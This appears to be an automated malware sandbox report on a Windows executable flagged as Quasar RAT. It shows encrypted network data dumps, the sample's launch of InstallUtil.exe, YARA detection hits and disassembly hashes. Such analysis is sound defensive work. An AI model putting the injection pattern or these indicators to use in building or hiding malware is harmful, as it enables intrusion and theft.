                                                                                2024-11-20 09:31:26 UTC8000INData Raw: 33 c7 3f 29 39 09 81 d6 ce cc 11 37 30 39 37 20 49 11 62 3b 31 33 01 94 dc c6 ce 0b 24 7d 33 39 11 0a 38 31 33 11 67 30 39 37 0a a8 de cc c6 17 13 d2 30 33 39 09 b5 d6 ce cc 11 1d 30 39 37 16 2e 19 1e 3a 31 35 28 5c 22 69 19 1d 3a 31 35 2a 47 13 42 30 33 39 19 65 3a 31 35 03 51 dc c6 ce 15 19 3a 33 39 31 0b 6c de cc c6 2e 39 b4 2d 33 39 30 20 4d 11 82 39 31 33 01 73 dc c6 ce 22 10 20 71 24 69 22 2b 2c a2 a5 11 5e 39 31 33 01 1c dc c6 ce cd 35 0e 33 19 3d 33 39 31 cd 35 2d 33 a5 11 9b 39 31 33 11 67 30 39 37 09 29 de cc c6 17 13 19 31 33 39 09 36 d6 ce cc c7 3d 7c 39 11 38 39 31 33 c7 3d 2e 39 ad 13 65 33 33 39 09 de d7 ce cc 28 61 1b 1a 32 33 3f 11 f8 38 31 33 01 ed dd c6 ce 22 72 27 0d 34 34 33 39 11 9c 39 31 33 01 fb dd c6 ce 13 4d 31 33 39 11 55 39 31
                                                                                Data Ascii: 3?)97097 Ib;13$}39813g097039097.:15(\"i:15*GB039e:15Q:391l.9-390 M913s" q$i"+,^91353=3915-3913g097)1396=|98913=.9e339(a23?813"r'4439913M139U91
                                                                                2024-11-20 09:31:26 UTC8000INData Raw: ce cc 19 a7 32 39 31 1b 6e 32 33 3f 0b 5c e9 ce cc 1f 11 2c 3b 31 33 01 55 e3 c6 ce 13 88 31 33 39 11 08 39 31 33 60 cf 3d 24 31 13 11 30 33 39 09 78 e9 ce cc c7 3d 7c 39 11 34 39 31 33 c7 3d 2e 39 ad 13 93 31 33 39 19 65 3a 31 35 03 1f e3 c6 ce 15 19 44 33 39 31 0b 1a e1 cc c6 11 1e 39 31 33 19 3a 33 39 31 6b c7 3f 2f 39 11 72 38 31 33 01 3b e3 c6 ce cd 35 0e 33 19 36 33 39 31 cd 35 2d 33 a5 11 76 3b 31 33 01 c3 fc c6 ce 22 77 27 22 77 bf 5a 11 17 30 39 37 13 fd 30 33 39 cf 3d 23 31 0b ed fe cc c6 cf 3f 06 31 13 2e 31 33 39 11 47 39 31 33 19 7e 33 39 31 6b a5 11 a3 38 31 33 01 88 fc c6 ce 13 b2 31 33 39 11 5a 39 31 33 61 cf 3d 25 31 13 8e 30 33 39 09 93 f6 ce cc 19 00 33 39 31 13 12 31 33 39 69 cd 37 2d 33 19 66 31 39 31 1b 6e 32 33 3f 08 b1 f6 ce cc 1f
                                                                                Data Ascii: 291n23?\,;13U139913`=$1039x=|94913=.9139e:15D391913:391k?/9r813;5363915-3v;13"w'"wZ097039=#1?1.139G913~391k813139Z913a=%1039391139i7-3f191n23?
                                                                                2024-11-20 09:31:26 UTC8000INData Raw: 39 11 3d 39 31 33 19 b8 33 39 31 13 14 31 33 39 68 af 19 37 31 39 31 0b 1d 80 cc c6 20 5f 4a 19 33 39 3b 1b 35 32 33 3f 20 36 2b 34 1b 93 33 33 3f 17 13 7d 31 33 39 cf 3d 23 31 0b c5 81 cc c6 20 6f b7 58 0a 0c 3c 33 39 11 1c 3b 31 33 01 dc 83 c6 ce cd 35 0e 33 19 23 33 39 31 cd 35 2d 33 a5 11 f8 39 31 33 c7 3f 29 39 09 fe 89 ce cc 28 74 22 11 20 68 19 ce 33 39 31 6c eb ad 13 53 33 33 39 09 8a 89 ce cc c7 3d 7c 39 11 38 39 31 33 c7 3d 2e 39 ad 13 af 31 33 39 cf 3d 23 31 0b a0 81 cc c6 20 5e 28 3e 22 54 20 3c a8 20 63 28 3e a2 58 e3 af 19 3e 31 39 31 0b bb 81 cc c6 20 1f 11 1a 30 39 37 22 6a 68 20 19 11 54 39 31 33 01 5d 83 c6 ce 22 1c 4f 14 39 31 39 11 0e 30 39 37 09 3f f0 cc c6 11 32 39 31 33 11 66 30 39 37 09 75 81 cc c6 17 13 1c 30 33 39 09 72 89 ce cc
                                                                                Data Ascii: 9=913391139h7191 _J39;523? 6+433?}139=#1 oX<39;1353#3915-3913?)9(t" h391lS339=|98913=.9139=#1 ^(>"T < c(>X>191 097"jh T913]"O919097?2913f097u039r
                                                                                2024-11-20 09:31:26 UTC8000INData Raw: da 39 31 39 13 31 19 c7 38 33 39 5e d9 39 31 39 13 31 19 c7 38 33 39 5e d8 39 31 39 13 31 0d 39 cf 3a 39 31 cd 30 30 33 11 dd 33 39 3b 19 07 31 cd 30 31 33 c7 38 32 39 19 de 39 31 39 13 1b cd 30 31 33 56 df 33 39 3b 19 39 1b cd 30 31 33 56 77 33 39 3b 19 39 0b cd 30 31 33 c7 38 32 39 5e 69 39 31 39 13 31 19 c7 38 33 39 5e 48 3a 31 35 13 31 09 c7 38 33 39 cf 3a 38 31 5c 62 31 33 33 1b 33 13 cf 3a 39 31 5c 65 31 33 33 1b 33 03 cf 3a 39 31 cd 30 30 33 56 4d 30 39 37 19 39 1f 33 c7 38 33 39 19 fb 39 31 39 13 1b cd 30 31 33 56 64 33 39 3b 19 39 1b cd 30 31 33 56 f8 33 39 3b 19 39 7f 33 c7 38 33 39 cf 3a 38 31 cd 30 33 33 11 de 33 39 3b 19 13 cf 3a 39 31 5c c9 31 33 33 1b 33 17 31 cd 30 31 33 11 c0 33 39 3b 19 13 cf 3a 39 31 5c 80 31 33 33 1b 33 13 cf 3a 39 31
                                                                                Data Ascii: 9191839^9191839^91919:9100339;1013829919013V39;9013Vw39;9013829^i9191839^H:151839:81\b1333:91\e1333:91003VM09793839919013Vd39;9013V39;93839:8103339;:91\1333101339;:91\1333:91
                                                                                2024-11-20 09:31:26 UTC8000INData Raw: 31 35 00 dd d4 c6 ce 15 19 cd 33 39 31 0b d8 d6 cc c6 cf 3f 35 31 13 33 31 33 39 cf 3f 31 31 af 19 26 33 39 31 cd 37 2f 33 01 f0 d4 c6 ce 13 42 31 33 39 11 66 39 31 33 61 cf 3d 31 31 13 da 31 33 39 19 f0 3a 31 35 00 96 d4 c6 ce 15 19 64 33 39 31 0b a5 d6 cc c6 11 2c 39 31 33 19 1f 33 39 31 6b c7 3f 3b 39 11 af 38 31 33 c7 3f 2d 39 09 48 de ce cc 19 43 33 39 31 13 0d 31 33 39 69 cd 37 23 33 19 50 33 39 31 0b 5f d6 cc c6 cf 3f 35 31 13 3b 31 33 39 11 5d 39 31 33 19 67 33 39 31 6b a5 11 c9 39 31 33 11 f2 30 39 37 09 7b d6 cc c6 17 13 02 30 33 39 09 04 de ce cc c7 3d 3e 39 11 3f 39 31 33 19 1b 33 39 31 13 12 31 33 39 69 af 19 77 32 39 31 1b fa 32 33 3f 0b 20 de ce cc 1f 11 57 38 31 33 01 39 d4 c6 ce cd 35 3c 33 19 29 33 39 31 13 48 31 33 39 11 3b 39 31 33 61
                                                                                Data Ascii: 15391?513139?11&3917/3B139f913a=11139:15d391,913391k?;9813?-9HC391139i7#3P391_?51;139]913g391k913097{039=>9?913391139iw29123? W81395<3)391H139;913a


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:04:31:24
                                                                                Start date:20/11/2024
                                                                                Path:C:\Users\user\Desktop\________.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\________.exe"
                                                                                Imagebase:0x140000
                                                                                File size:1'484'800 bytes
                                                                                MD5 hash:0A82B8151C26E0CFF39C459FD4E556EF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2157230652.0000000002805000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2186106678.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2170154648.0000000003B23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2191390517.0000000007101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2157230652.0000000002651000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:2
                                                                                Start time:04:31:28
                                                                                Start date:20/11/2024
                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                Imagebase:0x730000
                                                                                File size:42'064 bytes
                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.3368690490.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000002.00000002.3368690490.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 00C06BF8 Relevance: .3, Instructions: 276COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1d2657a2afbb95b1fd7d3851fd5b764359a950daf059f27f75f9eaa3782766d9
                                                                                  • Instruction ID: b694cf82798d2708af2fb55070032d32cc7897cc0b4b33095037e7e965aa11fd
                                                                                  • Opcode Fuzzy Hash: 1d2657a2afbb95b1fd7d3851fd5b764359a950daf059f27f75f9eaa3782766d9
                                                                                  • Instruction Fuzzy Hash: 0DC10370E01218CFEB54DF69D954BADBBB2FB89300F20A1A9D419A7398DB305E85CF41
                                                                                  Function 00C06C08 Relevance: .3, Instructions: 274COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c70114a06a7017a985635f3fa2d93668ff76ba49a0cd4650331c35ce366f7390
                                                                                  • Instruction ID: f86fc9c7db9d869d79285109a0e1f9991d927bfa036e064de82e891ec04d2ddd
                                                                                  • Opcode Fuzzy Hash: c70114a06a7017a985635f3fa2d93668ff76ba49a0cd4650331c35ce366f7390
                                                                                  • Instruction Fuzzy Hash: 75C10370E01218CFEB54DF69D954BADBBB2FB89300F60A1A9D419A7398DB305E85CF01
                                                                                  Function 00C05AC1 Relevance: .3, Instructions: 267COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e13d245168abf72e83bb59016d2a117c902281ed64e6a1e6be28b1c10fd7cdf9
                                                                                  • Instruction ID: d56b691c46d3a07d03961b927fd9618618ca8b8a2138bc5150851501cb6e6572
                                                                                  • Opcode Fuzzy Hash: e13d245168abf72e83bb59016d2a117c902281ed64e6a1e6be28b1c10fd7cdf9
                                                                                  • Instruction Fuzzy Hash: 34C13874E05318CFEB54DFA5D884BAEBBF2FB4A300F2091AAD419AB294D7745985CF01
                                                                                  Function 00C06F78 Relevance: .3, Instructions: 264COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 14efe341463b3c6239ba5ec6eeb3cbdb6632e51ad43657a94049e2d8c4197185
                                                                                  • Instruction ID: 3242ac846891984c0b5b1e38bb2e97375b3915f8cea3e4f80b66b57b44de2a68
                                                                                  • Opcode Fuzzy Hash: 14efe341463b3c6239ba5ec6eeb3cbdb6632e51ad43657a94049e2d8c4197185
                                                                                  • Instruction Fuzzy Hash: 6FC1D370E01218CFDB54DF69D994BADBBB2FB49304F60A1A9D419A7398DB309E85CF01
                                                                                  Function 00C05AD0 Relevance: .3, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25f9d43128ef9e79b1e7a9164be37052464e749a751812c739abe4bc389ed5e0
                                                                                  • Instruction ID: 0378ec66549422279427d6cb698b503c49a1aa574a13418e88d04be1706b3dc5
                                                                                  • Opcode Fuzzy Hash: 25f9d43128ef9e79b1e7a9164be37052464e749a751812c739abe4bc389ed5e0
                                                                                  • Instruction Fuzzy Hash: 10C13874E05318CFEB54DFA5D884BAEBBF2FB49300F2091AAD419AB294D7745985CF01
                                                                                  Function 00AD4120 Relevance: .2, Instructions: 206COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 943481721cdbf484a3206b6a1a1f571dd710968c6f13b05324898a2d67a66d1a
                                                                                  • Instruction ID: 3893b7949a26eac1119f59b8333edeb8220c78122c53e4eff5ccfe4e744cb82d
                                                                                  • Opcode Fuzzy Hash: 943481721cdbf484a3206b6a1a1f571dd710968c6f13b05324898a2d67a66d1a
                                                                                  • Instruction Fuzzy Hash: 9F610330704205DFD714DA38CC51B6A7BBAAB9A300F21466BE507DB3D9DA31DD828391
                                                                                  Function 00AD5837 Relevance: 2.8, Strings: 1, Instructions: 1504COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jjjjjj
                                                                                  • API String ID: 0-3900813449
                                                                                  • Opcode ID: de5e9d5cba5f95e6ec5f4d3db0fe70b8edfba7595f5fd844c1dde7de88015f1e
                                                                                  • Instruction ID: 8af768cbaa5fa71e2da1f6b620984899532938daa4e8433763311ed3330b4e32
                                                                                  • Opcode Fuzzy Hash: de5e9d5cba5f95e6ec5f4d3db0fe70b8edfba7595f5fd844c1dde7de88015f1e
                                                                                  • Instruction Fuzzy Hash: 1DE2397A650510EFCB4A9F98D948D55BBB2FF4D32471A81E8F2099B236C732D861EF40
                                                                                  Function 00AD572C Relevance: 2.7, Strings: 1, Instructions: 1479COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jjjjjj
                                                                                  • API String ID: 0-3900813449
                                                                                  • Opcode ID: 45c92e9354e98c36b27761c71b749a5c2761ec4c5eaa83e5f4760e401705f70e
                                                                                  • Instruction ID: 58d4edb39966375966f21a2c8987641b68229eea58e0a93aba74093441bc8e00
                                                                                  • Opcode Fuzzy Hash: 45c92e9354e98c36b27761c71b749a5c2761ec4c5eaa83e5f4760e401705f70e
                                                                                  • Instruction Fuzzy Hash: 36E2287A250510EFDB4A9F98D948D55BBB2FF4D32471A81E8F2099B236C732D861EF40
                                                                                  Function 00AD579F Relevance: 2.7, Strings: 1, Instructions: 1461COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jjjjjj
                                                                                  • API String ID: 0-3900813449
                                                                                  • Opcode ID: ec8c05a18c1fc8b4e299d8d7d035e5440ac8f474bca9627fd4de052b4cc8e162
                                                                                  • Instruction ID: f46537f06e3457d7a1419f4bb8a3289f3c2a97194193ae2e4ee050c7dfee8249
                                                                                  • Opcode Fuzzy Hash: ec8c05a18c1fc8b4e299d8d7d035e5440ac8f474bca9627fd4de052b4cc8e162
                                                                                  • Instruction Fuzzy Hash: 17E2287A250510EFDB4A9F98D948D55BBB2FF4D32471A81E8F2099B236C732D861EF40
                                                                                  Function 00AD57E7 Relevance: 2.7, Strings: 1, Instructions: 1461COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jjjjjj
                                                                                  • API String ID: 0-3900813449
                                                                                  • Opcode ID: 5f63940c94dc53d644dda49d541205ec093e40c192e86757dbe70b1ea8ef0ba9
                                                                                  • Instruction ID: f1b0b79535803224e46293edfd26d54e0d99df4703cbdf807405c3f59b646a2d
                                                                                  • Opcode Fuzzy Hash: 5f63940c94dc53d644dda49d541205ec093e40c192e86757dbe70b1ea8ef0ba9
                                                                                  • Instruction Fuzzy Hash: 3DE2287A250510EFDB4A9F98D948D55BBB2FF4D32471A81E8F2099B236C732D861EF40
                                                                                  Function 00AD56F0 Relevance: 2.7, Strings: 1, Instructions: 1437COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jjjjjj
                                                                                  • API String ID: 0-3900813449
                                                                                  • Opcode ID: 810594a19ba7b3a8cee132b02ca18b3a168625b16af99568837caa144fff76a1
                                                                                  • Instruction ID: fe28d48ee856a217d3392310d02188dd80fc02e16a0c0b3c83491bd63e8a376d
                                                                                  • Opcode Fuzzy Hash: 810594a19ba7b3a8cee132b02ca18b3a168625b16af99568837caa144fff76a1
                                                                                  • Instruction Fuzzy Hash: CBE2177A250510EFDB4A9F98D948D55BBB2FF4D32471A81E8F2099B236C732D861EF40
                                                                                  Function 00AD571A Relevance: 2.7, Strings: 1, Instructions: 1435COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jjjjjj
                                                                                  • API String ID: 0-3900813449
                                                                                  • Opcode ID: be8ba2c8b224f3ada1084953aa40497782ca0118b391a0a5139ed6d913b87851
                                                                                  • Instruction ID: c12a7f082ed061c16d7739af65ebb0f984c99d60561153d10a510df569735d19
                                                                                  • Opcode Fuzzy Hash: be8ba2c8b224f3ada1084953aa40497782ca0118b391a0a5139ed6d913b87851
                                                                                  • Instruction Fuzzy Hash: D3E2077A250510EFDB4A9F98D948D55BBB2FF4D32471A81E8F2099B236C732D861EF40
                                                                                  Function 00C08378 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 5$9
                                                                                  • API String ID: 0-1930205127
                                                                                  • Opcode ID: d1f929a2a03efa8b868d154b55ddd63cff9d075c3e15768e96ae53009c96f8a7
                                                                                  • Instruction ID: cb485be3add71355b56f325381d8ff8acf4c59633026da7ed6c7b7cc6c33c18d
                                                                                  • Opcode Fuzzy Hash: d1f929a2a03efa8b868d154b55ddd63cff9d075c3e15768e96ae53009c96f8a7
                                                                                  • Instruction Fuzzy Hash: C041E274E4022ACFDB64CF65C984BADBBF1AB49304F5090EAD45DA7254DB319E85CF10
                                                                                  Function 00C0873F Relevance: 2.5, Strings: 2, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -$B
                                                                                  • API String ID: 0-2800668091
                                                                                  • Opcode ID: bbb16d32aed5ac39f29a952b418735bec11818ad47204fdfa65794b821d69a69
                                                                                  • Instruction ID: 190533851fa631b6a60a345c1025cdd9f66b76168f3d7bbf1000bf01ebc18a62
                                                                                  • Opcode Fuzzy Hash: bbb16d32aed5ac39f29a952b418735bec11818ad47204fdfa65794b821d69a69
                                                                                  • Instruction Fuzzy Hash: 53F01D31C5570ACBCB218F10C80469FF7B1EF91300F509946E95977250EF70AA8ACF44
                                                                                  Function 00AD1978 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2156395871.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_ad0000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 63bc49d82f929a0e3be0fcc1e6a46142175a6649da6b2e125b6ce44e94bb784d
                                                                                  • Instruction ID: c80b41b11b6d3b47debf75e3e7bc03296132459cbab71a668c271ad0eb28f8fa
                                                                                  • Opcode Fuzzy Hash: 63bc49d82f929a0e3be0fcc1e6a46142175a6649da6b2e125b6ce44e94bb784d
                                                                                  • Instruction Fuzzy Hash: 0CE17D34708144AFDB04DFA9D864BADBBF2EF49310F2585AAE447DB3A2CA359C45CB41
                                                                                  Function 00C06FD5 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: attern
                                                                                  • API String ID: 0-1668960888
                                                                                  • Opcode ID: 7b22f2a1a6cc7dbc2f3d5dcd0d5664caa2a5fe5559e3d44a1e12e33a654fdb25
                                                                                  • Instruction ID: a9022f3f009038e9a7daee128855018183468c49da1d111840f245ad50de076d
                                                                                  • Opcode Fuzzy Hash: 7b22f2a1a6cc7dbc2f3d5dcd0d5664caa2a5fe5559e3d44a1e12e33a654fdb25
                                                                                  • Instruction Fuzzy Hash: 21B1F570E01218CFDB54EF69D954BADBBB2FB49304F60A1A9D419A7398DB309E85CF01
                                                                                  Function 00C09E2C Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: de5f00ddfbed619ba3e530090b969643953965c2ce781e229b4c01140cadc59d
                                                                                  • Instruction ID: c1e3f976d61d956ade51a4f059a8f43b5175d5c2813ed4664e29e62ec8952327
                                                                                  • Opcode Fuzzy Hash: de5f00ddfbed619ba3e530090b969643953965c2ce781e229b4c01140cadc59d
                                                                                  • Instruction Fuzzy Hash: 3041AD70A06228CFDB60CF19CD94BE9B7F5FB49304F10A5EAE50AA7295D7759A84CF00
                                                                                  Function 00C09CD3 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !
                                                                                  • API String ID: 0-2657877971
                                                                                  • Opcode ID: 3d385365434f0d47f2fa7ab12c3f766e851f806a6cba65289b1b3ffc00c57ea2
                                                                                  • Instruction ID: caed59c84a5c9a321f151dc4634347a5f7e134716f4a3f737756c8aaf1434845
                                                                                  • Opcode Fuzzy Hash: 3d385365434f0d47f2fa7ab12c3f766e851f806a6cba65289b1b3ffc00c57ea2
                                                                                  • Instruction Fuzzy Hash: 1B41FE74A06228CFDB20CF19CD94BE9B7F5FB49304F1091EAE50AA7295D7759A85CF00
                                                                                  Function 00C09C5E Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !
                                                                                  • API String ID: 0-2657877971
                                                                                  • Opcode ID: 5f0b4bd204f4b9ff67fe36644800913196b819e753abaf7038c794043b49401f
                                                                                  • Instruction ID: d453334f7c815d34d1892fa8cc919555c4eae8b7c02ce98f58a813ba057e2a56
                                                                                  • Opcode Fuzzy Hash: 5f0b4bd204f4b9ff67fe36644800913196b819e753abaf7038c794043b49401f
                                                                                  • Instruction Fuzzy Hash: 3831CB71A06228CFDB20CF59CD94BE9BBF5FB49304F1091EAE50AA7295D7759A84CF00
                                                                                  Function 00C08D2D Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2157101594.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_c00000_________.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: )
                                                                                  • API String ID: 0-2427484129
